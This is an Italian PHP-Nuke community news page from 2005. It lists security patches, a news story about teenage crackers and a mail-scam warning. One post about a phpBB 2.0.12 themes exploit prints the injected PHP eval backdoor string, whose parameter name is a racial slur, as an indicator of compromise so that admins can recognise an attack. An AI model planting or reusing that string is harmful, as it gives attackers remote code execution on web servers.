|  |
|
Nuova patch PHP-Nuke 7.8 e versioni precedenti
|
|
Nuova Patch PHPNuke 7.8 e versioni precedenti
Una nuova vulnerabilità SQL injection è stata scoperta per la versione 7.8
e tutte le versioni precedenti. Non si tratta di una patch di Chatserv (per
capirci non c'entra niente con la patch 3.1). Puoi scaricarla dalla sezione
Downloads e contiene i files per fare l'update sulla versione PHP-Nuke 7.8 e le
istruzioni per patchare manualmente tutte le altre versioni. Puoi realizzare le
modifiche molto facilmente e comunque nel file leggimi ci sono tutte le
istruzioni in italiano. Grazie a Zhen-Xjell da
CastleCops per due delle tre modifiche.
Download qui
( - Giovedì, 15 settembre ore 17,09)
|
Postato da in Giovedì, 15 settembre ore 17,09 (764 letture)
()
|
|
|
Nuova versione di Sentinel 2.4.0a
|
|
Ecco i cambiamenti apportati nella nuova versione di Sentinel 2.4.0a (23 agosto 2005):
+ Ottenuta la conformità 100% W3C HTML 4.01 (Steph Benoit)
+ Aggiornati Blocchi per titoli e conformità.
+ Spostato il link della "Lista Paesi" nel Menu Generale.
+ Eliminati altri piccoli bug.
Come si vede si tratta più di un'opera di ritocco di facciata senza alcuna aggiunta importante sull'aspetto della sicurezza. Questo può significare che gli spazi di attacco a Nuke si vanno sempre più restringendo e forse inizia un periodo - speriamo lungo - di (relativa) tranquillità per questo aspetto.
( - Martedì, 30 agosto ore 02,08)
|
Postato da in Martedì, 30 agosto ore 02,08 (676 letture)
()
|
|
|
FINALMENTE PRESI I PRIMI LAMERS: DUE DENUNCIATI
|
|
I due "capibanda" segnalati alla magistratura hanno solo 13 e 16 anni
I ragazzi coinvolti sono 10, tutti minorenni. I gruppi, gli «Staralo» e gli «Scurippio»
si sfidavano con incursioni su siti e caselle email
MILANO - Fino a ieri, i bulli si limitavano a insolentire i compagni di scuola
più indifesi. Magari si facevano consegnare soldi e oggetti. Ora, nell'era
digitale, anche il bullo diventa informatico. I finanzieri del comando
provinciale della Guardia di Finanza di Milano hanno «sgominato» due bande di
"cracker" rivali che si sfidavano online danneggiando siti Internet e impedendo
agli utenti di alcuni portali di accedere alla posta elettronica.
I due «capibanda» sono giovanissimi: hanno rispettivamente solo 13 e 16 anni.
Sono stati segnalati alla magistratura per accesso abusivo a un sistema
informatico, violazione di corrispondenza e impedimento illecito di
comunicazioni. Ma sono almeno una decina i «bulli informatici», tutti minorenni,
coivolti nell'indagine.
DENUNCIA - L'indagine è partita la primavera scorsa quando l'avvocato di una
multinazionale dell'industria informatica ha presentato un esposto alle Fiamme
Gialle di Milano segnalando danni economici, all'immagine ed a diritti connessi
al copyright, per una serie di «invasioni» di pirati informatici. I finanzieri
hanno quindi iniziato a indagare e con stupore si sono resi conto di non
trovarsi in presenza dei classici fenomeni di pirateria informatica, ma di avere
a che fare con due gruppi di cracker adolescenti in competizioni tra loro. Le
due bande informatiche, che sulle rete si facevano chiamare con i nomi di «Staralo»
e «Scurippio», si sfidavano cercando di far prevalere sui rivali le proprie
conoscenze tecniche. La storia era per altro piuttosto nota in rete, e circolava
su forum e siti «tecnici». «Sono ragazzi dai 13 ai 16 anni e hanno rotto le
scatole a mezzomondo», si legge di loro online.
CHE COSA FACEVANO - Gli «Staralo» si divertivano, con diverse procedure, a
inibire l'accesso alla caselle Msn e Hotmail ai legittimi proprietari di account
e-mail, modificandone sia la password di accesso, sia la parola chiave della
procedura Netpassport, utilizzata per ripristinare la password in caso di
smarrimento. Quando gli utenti provavano ad effettuare il cambio della password
si accorgevano che il loro «profilo» era stato irrimediabilmente compromesso e,
al posto della schermata normale, che appunto consente di cambiare la password,
apparivano scritte beffarde. La frangia degli «Scurippio» era, invece,
specializzata nel «defacing», quella tecnica che permette di entrare senza
autorizzazione su server altrui per cambiare la homepage, di solito lasciando la
proprio simbolo e la propria «firma» sulla pagina.
22 luglio 2005 (Corriere.it)
( - Sabato, 23 luglio ore 16,07)
|
Postato da in Sabato, 23 luglio ore 16,07 (1659 letture)
()
|
|
|
Tutorial aggiornamento Forum da BBtoNuke 2.0.15 a BBtoNuke 2.0.16
|
|
Corri ad aggiornare il tuo forum con le nuove patches!
Leggi qui il tutorial
( - Mercoledì, 29 giugno ore 18,06)
|
Postato da in Mercoledì, 29 giugno ore 18,06 (637 letture)
()
|
|
|
Security ALLARME!!!! Nuke 7.7 E 7.8 ATTACCABILI!!!!
|
|
Bob Marion ha pubblicato la seguente news:
ATTENZIONE!!!!!!! Il nuovo editor WYSIWYG
apre il tuo sito a molti attacchi di tipo sql injection attacks come pure a
molti altri tipi di attacchhi! Durante le mie prove ho trovato che alcune
stringhe possono essere pericolose sia usando sia non usando l'editor WYSIWYG
nelle textareas nelle versioni 7.7 e 7.8 . Personalmente NON USERO' LE VERSIONI
7.7 e 7.8 a causa degli accresciuti problemi di rischio sicurezza! Vi terremo
aggiornati sugli sviluppi.
( - Lunedì, 06 giugno ore 12,06)
|
Postato da in Lunedì, 06 giugno ore 12,06 (799 letture)
( | Security)
|
|
Ragazzi navigando quà e la ho trovato questa news che potrà interessarvi.
E' stato reso noto un exploit che permette di attaccare la tabella phpbb_themes utilizzata dai forum phpbb per gestire i temi.
Versioni vulnerabili : La versione 2.0.12 e tutte le versioni precedenti.
Questo exploit riesce ad acquisire i diritti di amministrazione (sfruttando un "errore di programmazione") che utilizza per modificare il tema del forum.
Cosa vede l'amministratore di un forum hackerato?
In seguito a questo attacco l'amministratore vedrà nella sezione "gestione stili/temi" tutti i temi cancellati tranne quello di default, che verrà impostato come tema corrente. Sempre in questo pannello l'amministratore vedrà la seguente stringa: Codice:
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../
../../../../../../../tmp
oltre a quella dello stile di default.
Se vedete la stringa riportata sopra nel vostro pannello è una chiara indicazione che il vostro forum è stato attaccato utilizzando l'exploit in questione.
Soluzione : Per impedire di essere attaccati da questo exploit basta aggiornare alla versione 2.0.13.
Nota del Webmaster: il consiglio è di aggiornare alla 2.0.15 perchè nel
frattempo anche e precedenti versioni sono diventate attaccabili.
( - Sabato, 04 giugno ore 22,06)
|
Postato da in Sabato, 04 giugno ore 22,06 (773 letture)
()
|
|
NukeSentinel 2.3.0 è qui....
( - Sabato, 04 giugno ore 10,06)
|
Postato da in Sabato, 04 giugno ore 10,06 (1556 letture)
(Leggi Tutto... | )
|
|
|
Truffa via posta per titolari di monini .it
|
|
Pongo a voi questa mail proveniente dal mio provider di servizi hosting, leggete attentamente.
Come già comunicato, molti di voi stanno ricevendo in questi giorni la "famosa" lettera proviente da un fantomatico "Registro italiano in Internet".
La lettera proviene dall'estero e la società inviante è:
DAD Deutscher Addressdienst GmbH
(denominata Editore) con sede in Weidestr.126, D-22083 Amburgo Germania fax 0049 40 75119911, Pretura d'Amburgo HRB- No 88 115,
Partita Iva DE813739877
ed il logo, molto simile a quello di Telecom Italia,
riporta il nome dell'inesistente registro.
Viene chiesto un reinvio via fax del modulo d'ordine
che impegna al versamento di 858 Euro (!!!) per la presenza del nome su un DC Rom.... con contratto triennale (858 Euro x 3 = 2574 Euro .....)
Cestinate la lettera e non rispondete in nessun caso al messaggio.
Il NIC italiano (che è il vero registro dei domini .IT) ha già intrapreso un'azione legale nei confronti della società tedesca.
Restiamo a disposizione per ogni ulteriore informazione o aiuto via helpdesk o via e-mail)
Spero che sia stata utile questa mia pubblicazione, per evitare truffe, che purtroppo oggi giorno sono sempre piu' frequenti.
( - Venerdì, 03 giugno ore 18,06)
|
Postato da in Venerdì, 03 giugno ore 18,06 (726 letture)
()
|
|
|
Security Nuova patch per Downloads, Web_Links, News, Surveys
|
|
E' stata appena scoperta da Manuel @ UltraDigital.it una nuova falla presente che interessa questi quattro moduli: Downloads, Web_Links, News, Surveys. Leggi il Tutorial.
( - Venerdì, 20 maggio ore 13,05)
|
Postato da in Venerdì, 20 maggio ore 13,05 (709 letture)
( | Security)
|
|
|
Sicurezza Patch per Galleria Coppermine v1.2.2b
|
|
Su www.phpnukefordonkeys.com
trovate questa patch grazie alla quale riparate in pochi secondi i diversi
bugs presenti nella versione più stabile di Coppermine e rendete sicuro
da attacchi il vostro sito.
Download qui
( - Venerdì, 13 maggio ore 22,05)
|
Postato da in Venerdì, 13 maggio ore 22,05 (942 letture)
( | Sicurezza)
|
|
91 Articoli (10 pagine, 10 per pagina)
 [ 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 ] |
|
|
Leggi News
